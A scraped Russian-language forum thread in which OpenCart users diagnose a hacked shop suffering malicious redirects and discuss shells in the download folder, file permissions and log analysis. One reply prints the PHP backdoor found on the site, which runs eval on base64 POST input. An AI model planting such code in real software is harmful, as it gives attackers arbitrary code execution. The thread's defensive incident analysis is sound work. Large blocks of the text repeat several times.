Опубліковано: 24 лютого 2014 джино Надіслати Поділитися на інших сайтах More sharing options... sitecreator Опубліковано: 24 лютого 2014 Share Опубліковано: 24 лютого 2014 Такая же фигня переадресация с данным плеером на сайт люксут причем на всех сайтах на аккаунте хостера не удивительно, что на всех сайтах. взломан аккаунт, значит есть доступ ко всем сайтам. Я, кстати, обращал неоднократное внимание сообщества (к заказчикам в первую очередь относится), что в защите не бывает мелочей. Но большинство исполнителей, как я вижу, просто напросто игнорируют основные правила безопасности на unix-хостингах. Назначают всем папкам права 777, например (так ведь быстрее движок установить!). Одна эта оплошность не критична, но когда такие оплошности суммируются, то может возникнуть проблема. Надіслати Поділитися на інших сайтах More sharing options... 2c4and Опубліковано: 24 лютого 2014 Share Опубліковано: 24 лютого 2014 не удивительно, что на всех сайтах. взломан аккаунт, значит есть доступ ко всем сайтам. Я, кстати, обращал неоднократное внимание сообщества (к заказчикам в первую очередь относится), что в защите не бывает мелочей. Но большинство исполнителей, как я вижу, просто напросто игнорируют основные правила безопасности на unix-хостингах. Назначают всем папкам права 777, например (так ведь быстрее движок установить!). Одна эта оплошность не критична, но когда такие оплошности суммируются, то может возникнуть проблема. у меня не на всех папках права 777))) только на 2-х Надіслати Поділитися на інших сайтах More sharing options... sitecreator Опубліковано: 24 лютого 2014 Share Опубліковано: 24 лютого 2014 у меня не на всех папках права 777))) только на 2-х у вас - да. а у топикстартера, например, все 777, что весьма нехорошо. В первую очередь проверьте сайты на вордпрессе и джумле (если таковые имеются). Через них ломают в первую очередь. А вообще интересно и ваш сайт посмотреть и сравнить. Может быть вас сломали тем же методом, каким был взломан сайт топикстартера. хостинги у вас разные. Надіслати Поділитися на інших сайтах More sharing options... 2c4and Опубліковано: 24 лютого 2014 Share Опубліковано: 24 лютого 2014 у вас - да. а у топикстартера, например, все 777, что весьма нехорошо. В первую очередь проверьте сайты на вордпрессе и джумле (если таковые имеются). Через них ломают в первую очередь. А вообще интересно и ваш сайт посмотреть и сравнить. Может быть вас сломали тем же методом, каким был взломан сайт топикстартера. хостинги у вас разные. http://bestsantehnika.com/ Надіслати Поділитися на інших сайтах More sharing options... sitecreator Опубліковано: 24 лютого 2014 Share Опубліковано: 24 лютого 2014 2c4and, движки у вас разных версий, более того в одном случае opencart, в другом (вашем) - ocstore. как вариант, дело в модулях, полученных из ненадежных источников. но не обязательно. Если скинете коды доступа в личку, то могу внимательнее посмотреть. Надіслати Поділитися на інших сайтах More sharing options... Назад 1 2 Вперед Сторінка 1 з 2 Створіть аккаунт або увійдіть для коментування Ви повинні бути користувачем, щоб залишити коментар Створити обліковий запис Зареєструйтеся для отримання облікового запису. Це просто! Зареєструвати аккаунт Вхід Уже зареєстровані? Увійдіть тут. Вхід зараз Share More sharing options... Передплатники 0 Перейти до списку тем Зараз на сторінці 0 користувачів Ні користувачів, які переглядиють цю сторінку Последние темы Последние дополнения Последние новости Вся активність Головна Підтримка та відповіді на запитання. Питання безпеки Похоже на сайт попал вирус Покупцям Оплата розширень фізичними особами Оплата розширень юридичними особами Політика повернень Розробникам Регламент розміщення розширень Регламент продажу та підтримки розширень Віртуальний обліковий запис автора Політика просування оголошень API каталогу розширень Вирішення спорів щодо авторських прав Корисна інформація Публічна оферта Політика повернень Політика конфіденційності Платіжна політика Політика передачі особистих даних Політика прозорості Останні розширення PRICE MASTER - Модуль імпорту/експорту товарів, парсинг, переклад, генерація текстів, редактор каталогу та багато іншого Автор: ScriptBrains 1.0 Синхронізація Замовлень Rozetka.ua та Opencart Автор: sinco Product Manipulator Автор: Hiperlynx007 Видалення дублікатів товарів для OpenCart Автор: Hatshypsut Вибір категорій і виробників для "Знайшли дешевше" шаблону Upstore Автор: Flint2000 × Уже зареєстровані? Ввійти Реєстрація Ваші замовлення Назад Придбані модулі та шаблони Ваші рахунки Лист очікувань Альтернативні контакти Форум Новини ocStore Назад Офіційний сайт Демо ocStore 3.0.3.2 Демо ocStore 2.3.0.2.4 Завантажити ocStore Документація Історія версій ocStore Блоги Модулі Шаблони Назад Безкоштовні шаблони Платні шаблони Де купувати модулі? Послуги FAQ OpenCart.Pro Назад Демо Купити Порівняння × Створити... Important Information На нашому сайті використовуються файли cookie і відбувається обробка деяких персональних даних користувачів, щоб поліпшити користувальницький інтерфейс. Щоб дізнатися для чого і які персональні дані ми обробляємо перейдіть за посиланням . Якщо Ви натиснете «Я даю згоду», це означає, що Ви розумієте і приймаєте всі умови, зазначені в цьому Повідомленні про конфіденційність. Я даю згоду
sitecreator Опубліковано: 21 лютого 2014 Share Опубліковано: 21 лютого 2014 Удалось решить проблему простым удалением вредоносного кода из .htaccess. Возможно это только временное решение, посмотрим. поверьте, это не решение проблемы. это лечение симптомов/последствий, а не причины. код ведь не их воздуха возник сам по себе. его туда внедрили. когда перекроете дыру, только тогда можете говорить о решении проблемы. У вас может быть уже шелл на сервере сидит и под его контролем весь аккаунт (все файлы, БД). Надіслати Поділитися на інших сайтах More sharing options... ravilr Опубліковано: 21 лютого 2014 Share Опубліковано: 21 лютого 2014 шаблон купленый? ;) Надіслати Поділитися на інших сайтах More sharing options... snastik Опубліковано: 21 лютого 2014 Share Опубліковано: 21 лютого 2014 Посмотрите в папку downloads, там тоже будет много вкусного! Надіслати Поділитися на інших сайтах More sharing options... dexion Опубліковано: 21 лютого 2014 Автор Share Опубліковано: 21 лютого 2014 шаблон купленый? ;) нет, шаблон дефолтный поверьте, это не решение проблемы. это лечение симптомов/последствий, а не причины. код ведь не их воздуха возник сам по себе. его туда внедрили. когда перекроете дыру, только тогда можете говорить о решении проблемы. У вас может быть уже шелл на сервере сидит и под его контролем весь аккаунт (все файлы, БД). да, согласен. а может подскажете, каким образом можно обнаружить первоначальную причину всего этого? или наводку кинете. а то в интернете как то не особо много информации про поиск и лечение вирусов на опенкарте Посмотрите в папку downloads, там тоже будет много вкусного! спасибо, глянем Надіслати Поділитися на інших сайтах More sharing options... dexion Опубліковано: 21 лютого 2014 Автор Share Опубліковано: 21 лютого 2014 Посмотрите в папку downloads, там тоже будет много вкусного! в папке download лежат 4 файла http://prntscr.com/2uhwdp : 1) пустой index.php 2) и 3) для маркета 4) непонятно что это и откуда взялось, дата 17.02 относительно недавняя (с какого момента появился этот вирус не знаю, обнаружил только вчера случайно зайдя с телефона). содержание файла примерно следующее: http://prntscr.com/2uhxcr можно ли считать 4й вариант причиной этой проблемы? Надіслати Поділитися на інших сайтах More sharing options... Tom Опубліковано: 21 лютого 2014 Share Опубліковано: 21 лютого 2014 Это первый звоночек.Не факт что это только в папке Download.Вирус мог легко уже добраться до системных файлов.Где угодно.Среди контроллеров способов доставки-оплаты, ckeditor итд.Вспоминайте сколько дополнений для экономии вы установили с варезников.Писать доктору , что вы ни с кем ни разу ,только усугубит положение в поиске найти лечение . :ugeek: Надіслати Поділитися на інших сайтах More sharing options... dexion Опубліковано: 21 лютого 2014 Автор Share Опубліковано: 21 лютого 2014 Это первый звоночек.Не факт что это только в папке Download.Вирус мог легко уже добраться до системных файлов.Где угодно.Среди контроллеров способов доставки-оплаты, ckeditor итд.Вспоминайте сколько дополнений для экономии вы установили с варезников.Писать доктору , что вы ни с кем ни разу ,только усугубит положение в поиске найти лечение . :ugeek: Так в том то и дело, что вроде бы уже давненько никаких модулей не ставил. Доступ к фтп был у стороннего человека, но не думаю, что он как то причастен к этому, хотя все возможно. Надіслати Поділитися на інших сайтах More sharing options... sitecreator Опубліковано: 21 лютого 2014 Share Опубліковано: 21 лютого 2014 Я бы не советовал вам удалять сейчас все подозрительные файлы, найденные вами. В них может оказаться много полезной информации для опытного человека. это как симптомы болезни для врача. даже установленные права на эти файлы - это уже показатель. у меня сейчас есть некоторое свободное время. если доверяете, то могу посмотреть на вашу проблему изнутри. для этого нужны коды доступа (в личку, конечно). Надіслати Поділитися на інших сайтах More sharing options... sitecreator Опубліковано: 21 лютого 2014 Share Опубліковано: 21 лютого 2014 <?php if(isset($_POST['execgate'])) { set_time_limit(0);ignore_user_abort(1);if(isset($_POST['action'])) {switch($_POST['action']) {case 'update': eval(base64_decode($_POST['file']));break;default: break;}} } ?> вот это довольно давно уже было на сайте. ворота нараспашку. т. е. кто угодно и когда угодно благодаря этой небольшой вставке мог запускать произвольный код и менять файлы как вздумается. но до поры до времени никто не заходил через эти ворота. Надіслати Поділитися на інших сайтах More sharing options... Denys Опубліковано: 22 лютого 2014 Share Опубліковано: 22 лютого 2014 а может подскажете, каким образом можно обнаружить первоначальную причину всего этого? анализируйте лог доступа по дате загрузки подозрительных файлов в папку dоwnload Надіслати Поділитися на інших сайтах More sharing options... sitecreator Опубліковано: 22 лютого 2014 Share Опубліковано: 22 лютого 2014 И довольно оригинально был обыгран момент, связанный с вредоносным кодом. Удаляешь этот код и получаешь кривые стили в админке. Т. е. сделано так, что при удалении вредоносного кода создается иллюзия, что вы удаляете нечто нужно и полезное, а поэтому возникает желание вернуть назад этот код. встречались ли вы с таким подходом? Надіслати Поділитися на інших сайтах More sharing options... markimax Опубліковано: 23 лютого 2014 Share Опубліковано: 23 лютого 2014 А какая версия opencart у вас? Потому что очень уж спокойно вам залили shell в папку download Какие модули стоят и какие vqmod допилы? Надіслати Поділитися на інших сайтах More sharing options... markimax Опубліковано: 23 лютого 2014 Share Опубліковано: 23 лютого 2014 И довольно оригинально был обыгран момент, связанный с вредоносным кодом. Удаляешь этот код и получаешь кривые стили в админке. Т. е. сделано так, что при удалении вредоносного кода создается иллюзия, что вы удаляете нечто нужно и полезное, а поэтому возникает желание вернуть назад этот код. встречались ли вы с таким подходом? Стабильная тема. Плюс еще файлы назвать именами контроллеров и т.п. Постоянно обнаруживаю файлы (в старых версиях) в папке download разного рода вредителей, только вот залить, еще не значит получить доступ к ним, так как они получают кодируемое имя. Это если ключ "дефолтный" как у всех в сборках, тогда можно получить контроль. Надіслати Поділитися на інших сайтах More sharing options... sitecreator Опубліковано: 23 лютого 2014 Share Опубліковано: 23 лютого 2014 А какая версия opencart у вас? для меня определенная загадка почему была выбрана версия 1.5.4 Opencart (не 1.5.4.1 и не ocStore) для создания магазина в конце 2013. Надіслати Поділитися на інших сайтах More sharing options... 2c4and Опубліковано: 24 лютого 2014 Share Опубліковано: 24 лютого 2014 Такая же фигня переадресация с данным плеером на сайт люксут причем на всех сайтах на аккаунте хостера Надіслати Поділитися на інших сайтах More sharing options... dexion Опубліковано: 24 лютого 2014 Автор Share Опубліковано: 24 лютого 2014 Такая же фигня переадресация с данным плеером на сайт люксут причем на всех сайтах на аккаунте хостера а какой у вас хостинг? Надіслати Поділитися на інших сайтах More sharing options... 2c4and Опубліковано: 24 лютого 2014 Share Опубліковано: 24 лютого 2014 джино Надіслати Поділитися на інших сайтах More sharing options... sitecreator Опубліковано: 24 лютого 2014 Share Опубліковано: 24 лютого 2014 Такая же фигня переадресация с данным плеером на сайт люксут причем на всех сайтах на аккаунте хостера не удивительно, что на всех сайтах. взломан аккаунт, значит есть доступ ко всем сайтам. Я, кстати, обращал неоднократное внимание сообщества (к заказчикам в первую очередь относится), что в защите не бывает мелочей. Но большинство исполнителей, как я вижу, просто напросто игнорируют основные правила безопасности на unix-хостингах. Назначают всем папкам права 777, например (так ведь быстрее движок установить!). Одна эта оплошность не критична, но когда такие оплошности суммируются, то может возникнуть проблема. Надіслати Поділитися на інших сайтах More sharing options... 2c4and Опубліковано: 24 лютого 2014 Share Опубліковано: 24 лютого 2014 не удивительно, что на всех сайтах. взломан аккаунт, значит есть доступ ко всем сайтам. Я, кстати, обращал неоднократное внимание сообщества (к заказчикам в первую очередь относится), что в защите не бывает мелочей. Но большинство исполнителей, как я вижу, просто напросто игнорируют основные правила безопасности на unix-хостингах. Назначают всем папкам права 777, например (так ведь быстрее движок установить!). Одна эта оплошность не критична, но когда такие оплошности суммируются, то может возникнуть проблема. у меня не на всех папках права 777))) только на 2-х Надіслати Поділитися на інших сайтах More sharing options... sitecreator Опубліковано: 24 лютого 2014 Share Опубліковано: 24 лютого 2014 у меня не на всех папках права 777))) только на 2-х у вас - да. а у топикстартера, например, все 777, что весьма нехорошо. В первую очередь проверьте сайты на вордпрессе и джумле (если таковые имеются). Через них ломают в первую очередь. А вообще интересно и ваш сайт посмотреть и сравнить. Может быть вас сломали тем же методом, каким был взломан сайт топикстартера. хостинги у вас разные. Надіслати Поділитися на інших сайтах More sharing options... 2c4and Опубліковано: 24 лютого 2014 Share Опубліковано: 24 лютого 2014 у вас - да. а у топикстартера, например, все 777, что весьма нехорошо. В первую очередь проверьте сайты на вордпрессе и джумле (если таковые имеются). Через них ломают в первую очередь. А вообще интересно и ваш сайт посмотреть и сравнить. Может быть вас сломали тем же методом, каким был взломан сайт топикстартера. хостинги у вас разные. http://bestsantehnika.com/ Надіслати Поділитися на інших сайтах More sharing options... sitecreator Опубліковано: 24 лютого 2014 Share Опубліковано: 24 лютого 2014 2c4and, движки у вас разных версий, более того в одном случае opencart, в другом (вашем) - ocstore. как вариант, дело в модулях, полученных из ненадежных источников. но не обязательно. Если скинете коды доступа в личку, то могу внимательнее посмотреть. Надіслати Поділитися на інших сайтах More sharing options... Назад 1 2 Вперед Сторінка 1 з 2 Створіть аккаунт або увійдіть для коментування Ви повинні бути користувачем, щоб залишити коментар Створити обліковий запис Зареєструйтеся для отримання облікового запису. Це просто! Зареєструвати аккаунт Вхід Уже зареєстровані? Увійдіть тут. Вхід зараз Share More sharing options... Передплатники 0 Перейти до списку тем Зараз на сторінці 0 користувачів Ні користувачів, які переглядиють цю сторінку Последние темы Последние дополнения Последние новости Вся активність Головна Підтримка та відповіді на запитання. Питання безпеки Похоже на сайт попал вирус Покупцям Оплата розширень фізичними особами Оплата розширень юридичними особами Політика повернень Розробникам Регламент розміщення розширень Регламент продажу та підтримки розширень Віртуальний обліковий запис автора Політика просування оголошень API каталогу розширень Вирішення спорів щодо авторських прав Корисна інформація Публічна оферта Політика повернень Політика конфіденційності Платіжна політика Політика передачі особистих даних Політика прозорості Останні розширення PRICE MASTER - Модуль імпорту/експорту товарів, парсинг, переклад, генерація текстів, редактор каталогу та багато іншого Автор: ScriptBrains 1.0 Синхронізація Замовлень Rozetka.ua та Opencart Автор: sinco Product Manipulator Автор: Hiperlynx007 Видалення дублікатів товарів для OpenCart Автор: Hatshypsut Вибір категорій і виробників для "Знайшли дешевше" шаблону Upstore Автор: Flint2000 × Уже зареєстровані? Ввійти Реєстрація Ваші замовлення Назад Придбані модулі та шаблони Ваші рахунки Лист очікувань Альтернативні контакти Форум Новини ocStore Назад Офіційний сайт Демо ocStore 3.0.3.2 Демо ocStore 2.3.0.2.4 Завантажити ocStore Документація Історія версій ocStore Блоги Модулі Шаблони Назад Безкоштовні шаблони Платні шаблони Де купувати модулі? Послуги FAQ OpenCart.Pro Назад Демо Купити Порівняння × Створити... Important Information На нашому сайті використовуються файли cookie і відбувається обробка деяких персональних даних користувачів, щоб поліпшити користувальницький інтерфейс. Щоб дізнатися для чого і які персональні дані ми обробляємо перейдіть за посиланням . Якщо Ви натиснете «Я даю згоду», це означає, що Ви розумієте і приймаєте всі умови, зазначені в цьому Повідомленні про конфіденційність. Я даю згоду
ravilr Опубліковано: 21 лютого 2014 Share Опубліковано: 21 лютого 2014 шаблон купленый? ;) Надіслати Поділитися на інших сайтах More sharing options... snastik Опубліковано: 21 лютого 2014 Share Опубліковано: 21 лютого 2014 Посмотрите в папку downloads, там тоже будет много вкусного! Надіслати Поділитися на інших сайтах More sharing options... dexion Опубліковано: 21 лютого 2014 Автор Share Опубліковано: 21 лютого 2014 шаблон купленый? ;) нет, шаблон дефолтный поверьте, это не решение проблемы. это лечение симптомов/последствий, а не причины. код ведь не их воздуха возник сам по себе. его туда внедрили. когда перекроете дыру, только тогда можете говорить о решении проблемы. У вас может быть уже шелл на сервере сидит и под его контролем весь аккаунт (все файлы, БД). да, согласен. а может подскажете, каким образом можно обнаружить первоначальную причину всего этого? или наводку кинете. а то в интернете как то не особо много информации про поиск и лечение вирусов на опенкарте Посмотрите в папку downloads, там тоже будет много вкусного! спасибо, глянем Надіслати Поділитися на інших сайтах More sharing options... dexion Опубліковано: 21 лютого 2014 Автор Share Опубліковано: 21 лютого 2014 Посмотрите в папку downloads, там тоже будет много вкусного! в папке download лежат 4 файла http://prntscr.com/2uhwdp : 1) пустой index.php 2) и 3) для маркета 4) непонятно что это и откуда взялось, дата 17.02 относительно недавняя (с какого момента появился этот вирус не знаю, обнаружил только вчера случайно зайдя с телефона). содержание файла примерно следующее: http://prntscr.com/2uhxcr можно ли считать 4й вариант причиной этой проблемы? Надіслати Поділитися на інших сайтах More sharing options... Tom Опубліковано: 21 лютого 2014 Share Опубліковано: 21 лютого 2014 Это первый звоночек.Не факт что это только в папке Download.Вирус мог легко уже добраться до системных файлов.Где угодно.Среди контроллеров способов доставки-оплаты, ckeditor итд.Вспоминайте сколько дополнений для экономии вы установили с варезников.Писать доктору , что вы ни с кем ни разу ,только усугубит положение в поиске найти лечение . :ugeek: Надіслати Поділитися на інших сайтах More sharing options... dexion Опубліковано: 21 лютого 2014 Автор Share Опубліковано: 21 лютого 2014 Это первый звоночек.Не факт что это только в папке Download.Вирус мог легко уже добраться до системных файлов.Где угодно.Среди контроллеров способов доставки-оплаты, ckeditor итд.Вспоминайте сколько дополнений для экономии вы установили с варезников.Писать доктору , что вы ни с кем ни разу ,только усугубит положение в поиске найти лечение . :ugeek: Так в том то и дело, что вроде бы уже давненько никаких модулей не ставил. Доступ к фтп был у стороннего человека, но не думаю, что он как то причастен к этому, хотя все возможно. Надіслати Поділитися на інших сайтах More sharing options... sitecreator Опубліковано: 21 лютого 2014 Share Опубліковано: 21 лютого 2014 Я бы не советовал вам удалять сейчас все подозрительные файлы, найденные вами. В них может оказаться много полезной информации для опытного человека. это как симптомы болезни для врача. даже установленные права на эти файлы - это уже показатель. у меня сейчас есть некоторое свободное время. если доверяете, то могу посмотреть на вашу проблему изнутри. для этого нужны коды доступа (в личку, конечно). Надіслати Поділитися на інших сайтах More sharing options... sitecreator Опубліковано: 21 лютого 2014 Share Опубліковано: 21 лютого 2014 <?php if(isset($_POST['execgate'])) { set_time_limit(0);ignore_user_abort(1);if(isset($_POST['action'])) {switch($_POST['action']) {case 'update': eval(base64_decode($_POST['file']));break;default: break;}} } ?> вот это довольно давно уже было на сайте. ворота нараспашку. т. е. кто угодно и когда угодно благодаря этой небольшой вставке мог запускать произвольный код и менять файлы как вздумается. но до поры до времени никто не заходил через эти ворота. Надіслати Поділитися на інших сайтах More sharing options... Denys Опубліковано: 22 лютого 2014 Share Опубліковано: 22 лютого 2014 а может подскажете, каким образом можно обнаружить первоначальную причину всего этого? анализируйте лог доступа по дате загрузки подозрительных файлов в папку dоwnload Надіслати Поділитися на інших сайтах More sharing options... sitecreator Опубліковано: 22 лютого 2014 Share Опубліковано: 22 лютого 2014 И довольно оригинально был обыгран момент, связанный с вредоносным кодом. Удаляешь этот код и получаешь кривые стили в админке. Т. е. сделано так, что при удалении вредоносного кода создается иллюзия, что вы удаляете нечто нужно и полезное, а поэтому возникает желание вернуть назад этот код. встречались ли вы с таким подходом? Надіслати Поділитися на інших сайтах More sharing options... markimax Опубліковано: 23 лютого 2014 Share Опубліковано: 23 лютого 2014 А какая версия opencart у вас? Потому что очень уж спокойно вам залили shell в папку download Какие модули стоят и какие vqmod допилы? Надіслати Поділитися на інших сайтах More sharing options... markimax Опубліковано: 23 лютого 2014 Share Опубліковано: 23 лютого 2014 И довольно оригинально был обыгран момент, связанный с вредоносным кодом. Удаляешь этот код и получаешь кривые стили в админке. Т. е. сделано так, что при удалении вредоносного кода создается иллюзия, что вы удаляете нечто нужно и полезное, а поэтому возникает желание вернуть назад этот код. встречались ли вы с таким подходом? Стабильная тема. Плюс еще файлы назвать именами контроллеров и т.п. Постоянно обнаруживаю файлы (в старых версиях) в папке download разного рода вредителей, только вот залить, еще не значит получить доступ к ним, так как они получают кодируемое имя. Это если ключ "дефолтный" как у всех в сборках, тогда можно получить контроль. Надіслати Поділитися на інших сайтах More sharing options... sitecreator Опубліковано: 23 лютого 2014 Share Опубліковано: 23 лютого 2014 А какая версия opencart у вас? для меня определенная загадка почему была выбрана версия 1.5.4 Opencart (не 1.5.4.1 и не ocStore) для создания магазина в конце 2013. Надіслати Поділитися на інших сайтах More sharing options... 2c4and Опубліковано: 24 лютого 2014 Share Опубліковано: 24 лютого 2014 Такая же фигня переадресация с данным плеером на сайт люксут причем на всех сайтах на аккаунте хостера Надіслати Поділитися на інших сайтах More sharing options... dexion Опубліковано: 24 лютого 2014 Автор Share Опубліковано: 24 лютого 2014 Такая же фигня переадресация с данным плеером на сайт люксут причем на всех сайтах на аккаунте хостера а какой у вас хостинг? Надіслати Поділитися на інших сайтах More sharing options... 2c4and Опубліковано: 24 лютого 2014 Share Опубліковано: 24 лютого 2014 джино Надіслати Поділитися на інших сайтах More sharing options... sitecreator Опубліковано: 24 лютого 2014 Share Опубліковано: 24 лютого 2014 Такая же фигня переадресация с данным плеером на сайт люксут причем на всех сайтах на аккаунте хостера не удивительно, что на всех сайтах. взломан аккаунт, значит есть доступ ко всем сайтам. Я, кстати, обращал неоднократное внимание сообщества (к заказчикам в первую очередь относится), что в защите не бывает мелочей. Но большинство исполнителей, как я вижу, просто напросто игнорируют основные правила безопасности на unix-хостингах. Назначают всем папкам права 777, например (так ведь быстрее движок установить!). Одна эта оплошность не критична, но когда такие оплошности суммируются, то может возникнуть проблема. Надіслати Поділитися на інших сайтах More sharing options... 2c4and Опубліковано: 24 лютого 2014 Share Опубліковано: 24 лютого 2014 не удивительно, что на всех сайтах. взломан аккаунт, значит есть доступ ко всем сайтам. Я, кстати, обращал неоднократное внимание сообщества (к заказчикам в первую очередь относится), что в защите не бывает мелочей. Но большинство исполнителей, как я вижу, просто напросто игнорируют основные правила безопасности на unix-хостингах. Назначают всем папкам права 777, например (так ведь быстрее движок установить!). Одна эта оплошность не критична, но когда такие оплошности суммируются, то может возникнуть проблема. у меня не на всех папках права 777))) только на 2-х Надіслати Поділитися на інших сайтах More sharing options... sitecreator Опубліковано: 24 лютого 2014 Share Опубліковано: 24 лютого 2014 у меня не на всех папках права 777))) только на 2-х у вас - да. а у топикстартера, например, все 777, что весьма нехорошо. В первую очередь проверьте сайты на вордпрессе и джумле (если таковые имеются). Через них ломают в первую очередь. А вообще интересно и ваш сайт посмотреть и сравнить. Может быть вас сломали тем же методом, каким был взломан сайт топикстартера. хостинги у вас разные. Надіслати Поділитися на інших сайтах More sharing options... 2c4and Опубліковано: 24 лютого 2014 Share Опубліковано: 24 лютого 2014 у вас - да. а у топикстартера, например, все 777, что весьма нехорошо. В первую очередь проверьте сайты на вордпрессе и джумле (если таковые имеются). Через них ломают в первую очередь. А вообще интересно и ваш сайт посмотреть и сравнить. Может быть вас сломали тем же методом, каким был взломан сайт топикстартера. хостинги у вас разные. http://bestsantehnika.com/ Надіслати Поділитися на інших сайтах More sharing options... sitecreator Опубліковано: 24 лютого 2014 Share Опубліковано: 24 лютого 2014 2c4and, движки у вас разных версий, более того в одном случае opencart, в другом (вашем) - ocstore. как вариант, дело в модулях, полученных из ненадежных источников. но не обязательно. Если скинете коды доступа в личку, то могу внимательнее посмотреть. Надіслати Поділитися на інших сайтах More sharing options... Назад 1 2 Вперед Сторінка 1 з 2 Створіть аккаунт або увійдіть для коментування Ви повинні бути користувачем, щоб залишити коментар Створити обліковий запис Зареєструйтеся для отримання облікового запису. Це просто! Зареєструвати аккаунт Вхід Уже зареєстровані? Увійдіть тут. Вхід зараз Share More sharing options... Передплатники 0 Перейти до списку тем Зараз на сторінці 0 користувачів Ні користувачів, які переглядиють цю сторінку Последние темы Последние дополнения Последние новости Вся активність Головна Підтримка та відповіді на запитання. Питання безпеки Похоже на сайт попал вирус Покупцям Оплата розширень фізичними особами Оплата розширень юридичними особами Політика повернень Розробникам Регламент розміщення розширень Регламент продажу та підтримки розширень Віртуальний обліковий запис автора Політика просування оголошень API каталогу розширень Вирішення спорів щодо авторських прав Корисна інформація Публічна оферта Політика повернень Політика конфіденційності Платіжна політика Політика передачі особистих даних Політика прозорості Останні розширення PRICE MASTER - Модуль імпорту/експорту товарів, парсинг, переклад, генерація текстів, редактор каталогу та багато іншого Автор: ScriptBrains 1.0 Синхронізація Замовлень Rozetka.ua та Opencart Автор: sinco Product Manipulator Автор: Hiperlynx007 Видалення дублікатів товарів для OpenCart Автор: Hatshypsut Вибір категорій і виробників для "Знайшли дешевше" шаблону Upstore Автор: Flint2000 × Уже зареєстровані? Ввійти Реєстрація Ваші замовлення Назад Придбані модулі та шаблони Ваші рахунки Лист очікувань Альтернативні контакти Форум Новини ocStore Назад Офіційний сайт Демо ocStore 3.0.3.2 Демо ocStore 2.3.0.2.4 Завантажити ocStore Документація Історія версій ocStore Блоги Модулі Шаблони Назад Безкоштовні шаблони Платні шаблони Де купувати модулі? Послуги FAQ OpenCart.Pro Назад Демо Купити Порівняння × Створити... Important Information На нашому сайті використовуються файли cookie і відбувається обробка деяких персональних даних користувачів, щоб поліпшити користувальницький інтерфейс. Щоб дізнатися для чого і які персональні дані ми обробляємо перейдіть за посиланням . Якщо Ви натиснете «Я даю згоду», це означає, що Ви розумієте і приймаєте всі умови, зазначені в цьому Повідомленні про конфіденційність. Я даю згоду
snastik Опубліковано: 21 лютого 2014 Share Опубліковано: 21 лютого 2014 Посмотрите в папку downloads, там тоже будет много вкусного! Надіслати Поділитися на інших сайтах More sharing options... dexion Опубліковано: 21 лютого 2014 Автор Share Опубліковано: 21 лютого 2014 шаблон купленый? ;) нет, шаблон дефолтный поверьте, это не решение проблемы. это лечение симптомов/последствий, а не причины. код ведь не их воздуха возник сам по себе. его туда внедрили. когда перекроете дыру, только тогда можете говорить о решении проблемы. У вас может быть уже шелл на сервере сидит и под его контролем весь аккаунт (все файлы, БД). да, согласен. а может подскажете, каким образом можно обнаружить первоначальную причину всего этого? или наводку кинете. а то в интернете как то не особо много информации про поиск и лечение вирусов на опенкарте Посмотрите в папку downloads, там тоже будет много вкусного! спасибо, глянем Надіслати Поділитися на інших сайтах More sharing options... dexion Опубліковано: 21 лютого 2014 Автор Share Опубліковано: 21 лютого 2014 Посмотрите в папку downloads, там тоже будет много вкусного! в папке download лежат 4 файла http://prntscr.com/2uhwdp : 1) пустой index.php 2) и 3) для маркета 4) непонятно что это и откуда взялось, дата 17.02 относительно недавняя (с какого момента появился этот вирус не знаю, обнаружил только вчера случайно зайдя с телефона). содержание файла примерно следующее: http://prntscr.com/2uhxcr можно ли считать 4й вариант причиной этой проблемы? Надіслати Поділитися на інших сайтах More sharing options... Tom Опубліковано: 21 лютого 2014 Share Опубліковано: 21 лютого 2014 Это первый звоночек.Не факт что это только в папке Download.Вирус мог легко уже добраться до системных файлов.Где угодно.Среди контроллеров способов доставки-оплаты, ckeditor итд.Вспоминайте сколько дополнений для экономии вы установили с варезников.Писать доктору , что вы ни с кем ни разу ,только усугубит положение в поиске найти лечение . :ugeek: Надіслати Поділитися на інших сайтах More sharing options... dexion Опубліковано: 21 лютого 2014 Автор Share Опубліковано: 21 лютого 2014 Это первый звоночек.Не факт что это только в папке Download.Вирус мог легко уже добраться до системных файлов.Где угодно.Среди контроллеров способов доставки-оплаты, ckeditor итд.Вспоминайте сколько дополнений для экономии вы установили с варезников.Писать доктору , что вы ни с кем ни разу ,только усугубит положение в поиске найти лечение . :ugeek: Так в том то и дело, что вроде бы уже давненько никаких модулей не ставил. Доступ к фтп был у стороннего человека, но не думаю, что он как то причастен к этому, хотя все возможно. Надіслати Поділитися на інших сайтах More sharing options... sitecreator Опубліковано: 21 лютого 2014 Share Опубліковано: 21 лютого 2014 Я бы не советовал вам удалять сейчас все подозрительные файлы, найденные вами. В них может оказаться много полезной информации для опытного человека. это как симптомы болезни для врача. даже установленные права на эти файлы - это уже показатель. у меня сейчас есть некоторое свободное время. если доверяете, то могу посмотреть на вашу проблему изнутри. для этого нужны коды доступа (в личку, конечно). Надіслати Поділитися на інших сайтах More sharing options... sitecreator Опубліковано: 21 лютого 2014 Share Опубліковано: 21 лютого 2014 <?php if(isset($_POST['execgate'])) { set_time_limit(0);ignore_user_abort(1);if(isset($_POST['action'])) {switch($_POST['action']) {case 'update': eval(base64_decode($_POST['file']));break;default: break;}} } ?> вот это довольно давно уже было на сайте. ворота нараспашку. т. е. кто угодно и когда угодно благодаря этой небольшой вставке мог запускать произвольный код и менять файлы как вздумается. но до поры до времени никто не заходил через эти ворота. Надіслати Поділитися на інших сайтах More sharing options... Denys Опубліковано: 22 лютого 2014 Share Опубліковано: 22 лютого 2014 а может подскажете, каким образом можно обнаружить первоначальную причину всего этого? анализируйте лог доступа по дате загрузки подозрительных файлов в папку dоwnload Надіслати Поділитися на інших сайтах More sharing options... sitecreator Опубліковано: 22 лютого 2014 Share Опубліковано: 22 лютого 2014 И довольно оригинально был обыгран момент, связанный с вредоносным кодом. Удаляешь этот код и получаешь кривые стили в админке. Т. е. сделано так, что при удалении вредоносного кода создается иллюзия, что вы удаляете нечто нужно и полезное, а поэтому возникает желание вернуть назад этот код. встречались ли вы с таким подходом? Надіслати Поділитися на інших сайтах More sharing options... markimax Опубліковано: 23 лютого 2014 Share Опубліковано: 23 лютого 2014 А какая версия opencart у вас? Потому что очень уж спокойно вам залили shell в папку download Какие модули стоят и какие vqmod допилы? Надіслати Поділитися на інших сайтах More sharing options... markimax Опубліковано: 23 лютого 2014 Share Опубліковано: 23 лютого 2014 И довольно оригинально был обыгран момент, связанный с вредоносным кодом. Удаляешь этот код и получаешь кривые стили в админке. Т. е. сделано так, что при удалении вредоносного кода создается иллюзия, что вы удаляете нечто нужно и полезное, а поэтому возникает желание вернуть назад этот код. встречались ли вы с таким подходом? Стабильная тема. Плюс еще файлы назвать именами 